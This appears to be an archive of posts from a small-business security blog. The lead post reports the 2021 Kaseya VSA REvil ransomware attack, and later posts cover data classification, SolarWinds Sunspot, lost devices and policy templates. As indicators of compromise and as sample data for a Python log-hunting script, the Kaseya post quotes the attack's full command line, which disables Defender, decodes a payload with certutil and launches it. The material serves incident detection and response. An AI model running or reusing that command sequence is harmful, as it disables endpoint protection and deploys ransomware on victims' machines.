Updated 7/2/2021 - 17:51 ET

Shortly after 2 PM on Friday, July 2, 2021, administrators of the Kaseya VSA (Remote Monitoring and Management) Software-as-a-Service platform began to experience issues: users were locked out and customer agents were receiving scripts that deployed ransomware.  By 3 PM Kaseya had shut down all of its cloud servers, placed them in maintenance mode, and sent communication to all self-hosted VSA partners telling them to shut down their servers.

At least 8 Technology Service Providers have confirmed that thousands of their customers have now been encrypted by a REvil ransomware-as-a-service affiliate.  Over the next 24-48 hours, both the number of service providers and the number of end customers affected by this is expected to grow.

If you are a Kaseya VSA provider, some signs of the attack are:

  • Ransomware encryptor is dropped to c:\kworking\agent.exe
  • The VSA procedure is named "Kaseya VSA Agent Hot-fix"
  • At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
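As an added example (not code from the original post or from Kaseya), the Python below hunts process-creation logs for the stages of the task quoted above: the Defender tamper via Set-MpPreference, the copy of certutil.exe to C:\Windows\cert.exe, the decode of agent.crt into agent.exe, and the launch of c:\kworking\agent.exe. The log records are constructed sample data in a Sysmon-like shape with made-up host names; the only real indicator content is the task command line reproduced from the list above.

```python
"""Hunt process-creation logs for the Kaseya VSA ransomware task stages.

Added example, not code from the original post or from Kaseya. The indicators
are the stages of the task command line quoted above; the events below are
constructed sample records (Sysmon-like fields, made-up host names).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str      # endpoint the process started on
    image: str     # executable path
    cmdline: str   # full command line as logged


# Each rule is applied to the lower-cased command line. The four stages come
# from the quoted task; several distinct stages on one host is strong evidence.
RULES = [
    ("defender_disabled_via_powershell",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$true")),
    ("certutil_copied_to_cert_exe",
     re.compile(r"copy\s+/y\s+\S*certutil\.exe\s+\S*\\cert\.exe")),
    ("agent_crt_decoded_to_exe",
     re.compile(r"cert(util)?\.exe\s+-decode\s+\S*\\kworking\\agent\.crt"
                r"\s+\S*\\kworking\\agent\.exe")),
    ("kworking_agent_exe_launched",
     re.compile(r"(^|[\s&])\S*\\kworking\\agent\.exe\s*$")),
]


def scan_events(events):
    """Return {host: [matched rule names]} for hosts with at least one match."""
    hits = {}
    for ev in events:
        line = ev.cmdline.lower()
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(ev.host, []).append(name)
    return hits


def triage(hits, threshold=2):
    """Hosts showing at least `threshold` distinct stages, sorted by name."""
    return sorted(h for h, names in hits.items() if len(set(names)) >= threshold)


# The task command line reported in the indicators above, reproduced as data.
KASEYA_TASK = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
    r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)

# Constructed sample events: one full attack chain, one benign certutil use,
# and one host where only the final launch was captured.
SAMPLE_EVENTS = [
    ProcEvent("WS-ACCT-07", r"C:\WINDOWS\system32\cmd.exe", KASEYA_TASK),
    ProcEvent("WS-ENG-03", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\Users\jdoe\Downloads\setup.msi SHA256"),
    ProcEvent("WS-HR-11", r"c:\kworking\agent.exe", r"c:\kworking\agent.exe"),
]

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for host, names in found.items():
        print(host, sorted(set(names)))
    print("isolate first:", triage(found))
```

A single stage (for example only the agent.exe launch) is worth a look; two or more distinct stages on the same host should be treated as confirmed and that host isolated before the rest of the log is reviewed.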

 

What about Multi-Factor Authentication (MFA)?

A number of the service providers impacted by this have also acknowledged that multi-factor authentication was in use for all accounts and the breach still occurred.  This points to a supply-chain-style zero-day vulnerability within the Kaseya VSA platform.  This is an important fact, as MFA has become a security baseline for preventing attacks and securing environments.

What is happening?

Once a service provider's Remote Monitoring and Management toolset is compromised, users have reported that all users of the Kaseya VSA platform are locked out; the agent then drops a certificate file, named agent.crt, into the c:\kworking folder, which is used for VSA updates.  A PowerShell command is then launched to decode the agent.crt file using the legitimate Microsoft Windows certutil.exe and extract an agent.exe file to the same folder.

The new agent.exe is signed with a certificate issued to PB03 Transport LTD and contains an embedded MsMpEng.exe and MPSvc.dll.  The DLL is the REvil encryptor, while MsMpEng.exe is used to load the DLL and encrypt the drive.

The Demand!

A sample of the REvil ransomware used in one of these attacks has been shared online, but it is not certain that the same demand will apply to all victims.  For the sample posted online, the ransomware gang is demanding a $5 Million ransom to receive the decryption key.  You can view the configuration file dump here.

What's Next?

The speed at which files were encrypted after Kaseya VSA user accounts were locked out could suggest that files were not exported before encryption; however, ransomware has trended more and more toward the export-then-encrypt method, so if your data is encrypted I would assume it may have been breached, and you should review your breach notification plans.

The impacted service providers will work tirelessly to restore both their own and their clients' systems, likely all hands on deck all weekend long.  Kaseya will do the same, as getting the platform back online and patching the security flaws are the top two priorities for retaining their customer base.

While the attack started only roughly 4 hours ago, it will be days or weeks until the full scope is understood.

We also continue our series today on improving your organization's cyber security documentation.  We have looked at Vendor Security Questionnaires and the Acceptable Use Policy; today we are going to start the process of data classification.

A Data Classification Policy details why data classification should be done and establishes a framework for classifying data based on its sensitivity, value, and criticality to the organization.

You want to break out roles and responsibilities, typically Data Owners, Data Custodians, and Data Users.  The owner is typically the department head or business owner responsible for the security of the data, whereas data custodians are typically your IT department or vendor.  Data users are then all of the users that can or do access the data.

So I would start with your network share drives and identify an overall impact level and classification label for each.  Typically, your impact levels will be high, moderate, and low.  The classification labels should be something like restricted, confidential, and public.  Since you create this scheme, you can have more impact levels or classifications, but it has to make sense to you and your data custodians.

Next you want to build a guideline on what makes data fit into the impact and classification labels.  Again, the goal is for the data owners to classify the data, so your guidelines ensure that the data gets labeled correctly.

The guidelines should also ensure that data containing authentication information, Electronic Protected Health Information (ePHI), payment card information (PCI), or other Personally Identifiable Information (PII) is labeled as restricted and high impact.
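As an added example (not from the original post, and not a sample policy from TheMorningBreach), the Python below applies the guideline just described to files on a network share: anything containing authentication information, ePHI, PCI or PII is forced to restricted/high, and everything else gets a conservative default that the data owner still has to confirm. The detectors are deliberately simple heuristics (a Luhn check for card numbers, an SSN shape, keyword matches), the default label of confidential/moderate is an assumption of this example, and the share contents are constructed sample data.

```python
"""Suggest a data classification label for files on a network share.

Added example, not from the original post or any product: the labels and
impact levels (restricted/high for authentication data, ePHI, PCI and PII)
follow the guideline described above; the detectors are simple heuristics,
and the share contents below are constructed sample data.
"""
import re

# Keyword/pattern detectors for the regulated data types named in the guideline.
# Detecting ePHI by keyword is an assumption of this example; real discovery
# tools use far richer dictionaries.
PATTERNS = {
    "authentication": re.compile(r"\b(password|passwd|api[ _-]?key|secret)\b\s*[:=]", re.I),
    "ePHI": re.compile(r"\b(MRN|medical record|diagnosis|patient id)\b", re.I),
    "PII": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),          # US SSN shape
}
# Candidate card numbers: 13-19 digits, optionally separated by spaces or dashes.
PAN_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to separate real card numbers from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_regulated_data(text: str) -> list:
    """Return the regulated data categories present in text, in guideline order."""
    found = [name for name, rx in PATTERNS.items() if rx.search(text)]
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append("PCI")
            break
    return found


def suggest_classification(text: str):
    """(label, impact, reasons). Regulated data forces restricted/high; anything
    else defaults to confidential/moderate pending the data owner's review
    (a conservative default chosen for this example)."""
    reasons = find_regulated_data(text)
    if reasons:
        return ("restricted", "high", reasons)
    return ("confidential", "moderate", [])


def classify_share(files: dict) -> dict:
    """Map each path in {path: contents} to its suggested classification."""
    return {path: suggest_classification(body) for path, body in files.items()}


# Constructed share contents; the card number is the standard Visa test number
# and the 16-digit order id fails the Luhn check on purpose.
SAMPLE_SHARE = {
    r"\\fs01\finance\q3_cards.txt": "Customer card on file: 4111 1111 1111 1111 exp 12/24",
    r"\\fs01\hr\new_hires.csv": "name,ssn\nJane Doe,123-45-6789",
    r"\\fs01\it\runbook.txt": "Service account password: Summer2021!",
    r"\\fs01\clinic\visit_notes.txt": "Patient ID: 44812, diagnosis: hypertension",
    r"\\fs01\ops\orders.csv": "order_id\n1234567890123456",
}

if __name__ == "__main__":
    for path, (label, impact, why) in classify_share(SAMPLE_SHARE).items():
        print(f"{path}: {label}/{impact} {why}")
```

The output is a suggestion list for the data owner, not a final label: the guideline says the owner classifies, so the tool's job is to make sure nothing holding regulated data slips through as confidential or public.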

You can find a sample data classification policy, as well as the other policies we've covered, at TheMorningBreach.Com under Resources, Template Downloads.

This is a great policy to get started on today.  As a champion of Data Privacy Day through the National Cyber Security Alliance, we are trying to help you "Respect Privacy" by ensuring your cyber security policies are up to date and designed for the current state of the world.

Intel has added ransomware detection capabilities at the silicon level in its 11th generation Intel Core vPro CPUs with support for the Hardware Shield and Threat Detection Technology (TDT) features.  Through a partnership with Boston-based Cybereason, these new features are expected in the first half of 2021.

Hardware Shield is a technology that locks down the UEFI/BIOS, whereas TDT uses CPU telemetry and machine-learning heuristics to detect potentially malicious code.  The idea behind the new features is for the CPU to share some of its telemetry with security software and allow it to spot malware that may be hiding in places where antivirus apps can't reach.  Because the Intel Performance Monitoring Unit (PMU) sits beneath the applications, the OS, and the virtualization layers on the system, it can deliver a more accurate, system-wide representation of active threats.

So if you’re looking at replacing computers, you may want to wait for the new 11th generation Intel chips.

A third malware strain used in the SolarWinds supply chain attack has been identified by CrowdStrike, and it sheds some light on how the attackers compromised the SolarWinds Orion build process.

Named Sunspot, this finding adds to the previously discovered Sunburst and Teardrop malware strains.  While Sunspot is the latest discovery, there is evidence that it was the first one used, going back to September 2019, when the cyber criminals first breached SolarWinds' internal network.

Sunspot was placed on a build server, and its purpose was simply to watch the build server for build commands that assembled Orion.  Once a build command was detected, the malware would silently replace source code files inside the Orion app with files that loaded the Sunburst malware, resulting in Orion app versions that also installed Sunburst.

The trojanized Orion builds eventually made their way to one of SolarWinds' official update servers and were installed globally.  Sunburst would activate inside the internal networks of businesses and governments, collect data on its victims, and send the information back to the cyber criminals via DNS requests.  If the threat actors decided a victim was important enough to compromise, the more powerful Teardrop backdoor trojan would be deployed; otherwise they would instruct Sunburst to delete itself from networks deemed insignificant or too high risk.
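As an added example (not SolarWinds' or CrowdStrike's code, and not a description of how Sunspot was actually found), the Python below shows the check that the passage above implies a build pipeline should make: record a SHA-256 manifest of the source tree at checkout and re-verify it immediately before the compiler runs, so a source file swapped in on the build server shows up as modified and an unexpected file shows up as added. The source tree is constructed in a temporary directory and the file names are made up.

```python
"""Detect source-tree tampering between checkout and build.

Added example (not SolarWinds' or CrowdStrike's code): a build pipeline records
a SHA-256 manifest of the source tree at checkout and re-verifies it right
before the compiler runs, so a file swapped in by a build-server implant shows
up as 'modified'. The source tree below is constructed in a temp directory.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large sources do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """{relative_path: sha256} for every regular file under root."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_manifest(root, manifest):
    """Compare the tree as it is now against the manifest recorded at checkout."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "added": sorted(p for p in current if p not in manifest),
        "removed": sorted(p for p in manifest if p not in current),
    }


def build_is_trustworthy(report):
    """The build may proceed only when nothing changed since checkout."""
    return not any(report.values())


def demo():
    """Construct a tiny source tree, record it, tamper with it, and re-verify."""
    with tempfile.TemporaryDirectory() as root:
        src = os.path.join(root, "src")
        os.makedirs(src)
        with open(os.path.join(src, "Scheduler.cs"), "w") as f:
            f.write("// original source\n")
        with open(os.path.join(src, "Program.cs"), "w") as f:
            f.write("// entry point\n")
        recorded = build_manifest(root)          # taken right after checkout
        assert build_is_trustworthy(verify_manifest(root, recorded))
        # Simulate an implant on the build server swapping one source file and
        # dropping another between checkout and compile.
        with open(os.path.join(src, "Scheduler.cs"), "w") as f:
            f.write("// replaced during build\n")
        with open(os.path.join(src, "Extra.cs"), "w") as f:
            f.write("// unexpected file\n")
        return verify_manifest(root, recorded)   # taken right before compile


if __name__ == "__main__":
    report = demo()
    print(report)
    print("proceed with build:", build_is_trustworthy(report))
```

The manifest only helps if it is produced and stored somewhere the build host cannot rewrite (for example by the source control server or a separate signing step); a manifest generated on the same compromised build server proves nothing.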

We begin today with a look at the recent Parler shutdown and what it means to you as a business owner.  Politics aside, the recent decisions by multiple private technology providers to no longer do business with a company should have you evaluating your technology stack as well.  For the vast majority of us, we will never be in the same boat Parler found themselves in, but a precedent has been set, and it should now be included in your business continuity plans.

It could be your social media marketing presence or it could be your platform as a whole.  Section 230 of the U.S. Code, which was developed to promote the continued development of the internet, actually protects providers and users from liability for any action voluntarily taken in good faith to restrict access to or availability of material that the provider or user considers to be obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable, whether or not such material is constitutionally protected.

So Section 230 actually protects any provider that takes action to restrict access to posts.  The slippery slope is that the definition of what is considered a violation is ever-changing and open-ended, so depending on the audience, your content may be appropriate today but not tomorrow.

At the end of the day, the data center hosts like Amazon AWS, the app store owners like Apple or Google, and even the company hosting your website are private businesses and, depending on your contracted terms, can ask you to remove your data.

This is where it's important to understand the contract: depending on what you are hosting online, know the terms for cancellation of service and how long you would have to locate a new provider and move your data.

So inside your business continuity plans, you should add a section that includes the contract information for your web service providers and what the ramifications would be if a service went offline.

It also appears that right before the site was taken offline, roughly 70 TB of data, including messages, videos, group members and administrative accounts, posts, and even deleted posts, was leaked.  This data might prove valuable to law enforcement, since many who participated in the recent protests at the U.S. Capitol building used the social platform.

Laptops and other portable devices (phones, tablets, USB drives, and so on) are frequently stolen or lost, so every company at some point is going to need to deal with a missing device.  Within your acceptable use policy, employees should be required to report immediately when one of these devices goes missing.

It is being reported that during the breach of the United States Capitol building a laptop belonging to House Speaker Nancy Pelosi was stolen, which hopefully is secured with some of the proactive security steps below to limit the risk of a more severe data breach.

The actions taken before a device goes missing are crucial in determining what steps will have to be taken when it does.

The first thing that needs to be completed is understanding who the user is going to be and what types of data may be found on the device.  Every effort should be made to limit data on the laptop itself, but for some users having that data locally is going to be required for their job.  When data has to leave the confines of the server infrastructure, it has to be classified and documented within your data management policy so that if or when that device is stolen you know what data is at risk of breach.

That step should be mandatory, and beyond it there are proactive steps that can be taken to limit the damage and risk to the data and your business.

First, ensuring that the password is not on a sticker on the device is a great step one, but enabling multi-factor authentication is a more secure method that should be used whenever dealing with data of high or critical classifications, like PII or client data.

Even with a password in place, data on mobile devices is at risk of breach.  It should be mandatory to require drive encryption using, at minimum, the built-in BitLocker or Apple FileVault.

At this point, if a device is lost or stolen, you can validate with a degree of certainty that the data is safe.

Now suppose one or more of the proactive measures was not in place and you've experienced the loss of a device.  Remember that reports of missing or lost devices should funnel to your IT department or vendor.

Here you have to start at the beginning and understand what data was on the device and what, if any, proactive measures were in place to protect that data.  If you can't validate with certainty, then you should assume the data was breached; even worse, if you don't know what data was stored locally on the device, then you should assume everything that was accessible by the user was stored locally, including e-mails.

Depending on your local and federal laws, compliance requirements, and the type of data, it may trigger a breach notification, which is why it's better to know than to have to assume the worst.  The chances of recovering the device vary with the type of device, but you should assume that it will not be recovered.

You've now identified the damage and started the breach notification process; now it's time to secure the compromised user.

Using Microsoft 365 or your e-mail provider, you should be able to lock out the device and potentially wipe the data that was stored on the laptop remotely.  You can also block the device's MAC address on the firewall and wireless networks, depending on the network infrastructure used and the risk determined.

Passwords should be changed; any passwords that may have been stored in web browsers should be assumed compromised and added to banned-password lists if you maintain them.

You will also want to go through the systems and services the device was connected to and remove active licenses where applicable for the case.

Finally, an incident report should be filed, and documentation should be reviewed and updated with changes to the processes followed.

At the end of the day, it is the responsibility of the business owner to protect their technology assets and data.  If you're that business owner, or a person hired to protect those resources, you must ensure the policies you build protect you.

If you have questions, ask your IT department or vendor.  If you’re still not sure reach out to other local vendors or post a message in the comments.

Continuing on our journey to improve your business documentation, we are going to target the Acceptable Use Policy (AUP), which every business should have; it should be part of the hiring process and reviewed annually by all of your employees.

The purpose of an AUP is to outline the acceptable use of technology, including data, for your employees.  That could cover social media postings, what you use your work laptop for, mobile devices, electronic communication, and more.

Your AUP needs to identify the general use and ownership of equipment and data, especially as the remote workforce is not going away anytime soon.  It needs to outline that the employee is responsible for the protection of any data on their systems or to which they have access.  This includes making sure the computer is locked when they are away and not allowing their kids to use the work laptop for schoolwork.

It also needs to outline that you reserve the right to scan computers, network devices, web traffic, e-mail, communication traffic, and other resources to ensure they are being used as outlined in the AUP.

Next you dig into security, typically outlining password requirements and other business practices that are followed, like Zero Trust.

The most important section is the compliance section, and what the penalty is for non-compliance. 

If you don’t already have an AUP at your business you can locate a free sample at TheMorningBreach.com to help you get started.

I have been asked if the cyber security industry needs more advanced solutions to combat the challenges faced today, and I don't think we do.  Most of the successes of cyber criminals are achieved using methods that have been around for years: not patching a system, using default or easy-to-guess credentials, or falling for social engineering and giving up your credentials.  There is an amazing suite of tools and services that are well positioned to accept the challenge and give you peace of mind, while knowing that there is never going to be a 100% solution.

The biggest challenge I see is cyber security inexperience, or a small IT shop that promotes its cyber security model when in reality all of its time is spent putting out fires in reactive responses.  There is no single test or single association that can proclaim it knows better than the next, and that places business owners in a tough spot when finding the right solution and partner to protect their data.

The best thing for you to do as a business owner is to perform annual checks and balances on your partners, or even your internal staff, and you achieve this with a third-party security audit.  In today's world of cyber security, it's not a threat that you're not doing your job.  It's a case of: let's have someone who knows nothing about what you're doing try to get in and see what they find.  That fresh set of eyes will likely uncover something every time.

Not only will adding this to your plan in 2021 better protect you, it also aligns you more closely with industry standards and compliance requirements, and you will likely be able to provide that report for savings on cyber security insurance, which after 2020 is sure to rise in cost.

The word breach indicates that a safeguard has failed and the resources that were behind that safeguard are now at risk.  Often that threat is virtual, but it can be physical as well.

Currently in the United States, protestors have stormed the United States Capitol and gained illegal access to offices used by House and Senate members.  Once the building, or safeguard, was breached, the elected officials and staffers were moved to secure areas, as they should be.

At this point there is also a threat to the technology infrastructure and data.  It could be a random device plugged into an open network jack, damage to physical technology equipment, or even a breach of the data itself.  You would expect measures to be in place that automatically lock the screen, and that systems would be encrypted, to limit the risk of access to these machines.

What if that is not the case?  A photo posted to social media, claiming to be taken inside the office of Nancy Pelosi, the Speaker of the House, shows revolutionaries and an unlocked Windows 10 computer.

Now, your business likely doesn't hold data similar to what may be on this specific computer, but what data is on your computers, and how would losing that data or reporting a breach of it affect your business?

It should be assumed that a data breach has occurred here, because the potential for access to confidential files is evident from the alleged photo.

We should use this as an example to document a plan of action and review the security of your current systems, beginning with the current screen saver and password requirement policy.

Next, you have to assume a data breach occurred, so a complete forensic review of systems and network infrastructure has to be completed to validate that the data and systems are secure.  Every user should be required to change their passwords, and access to technology assets should be blocked until each system is validated.

Mailbox rules need to be reviewed, and all data leaving the network needs to be blocked and examined to ensure that everything leaving is legitimate.

Cyber attacks and data breaches happen in many ways.  When a situation arises that is not normal, it should call us all to use it as a learning opportunity and improve our own security.

© 2021 The Morning Breach, All Rights Reserved. Produced and Created by Scott R Davis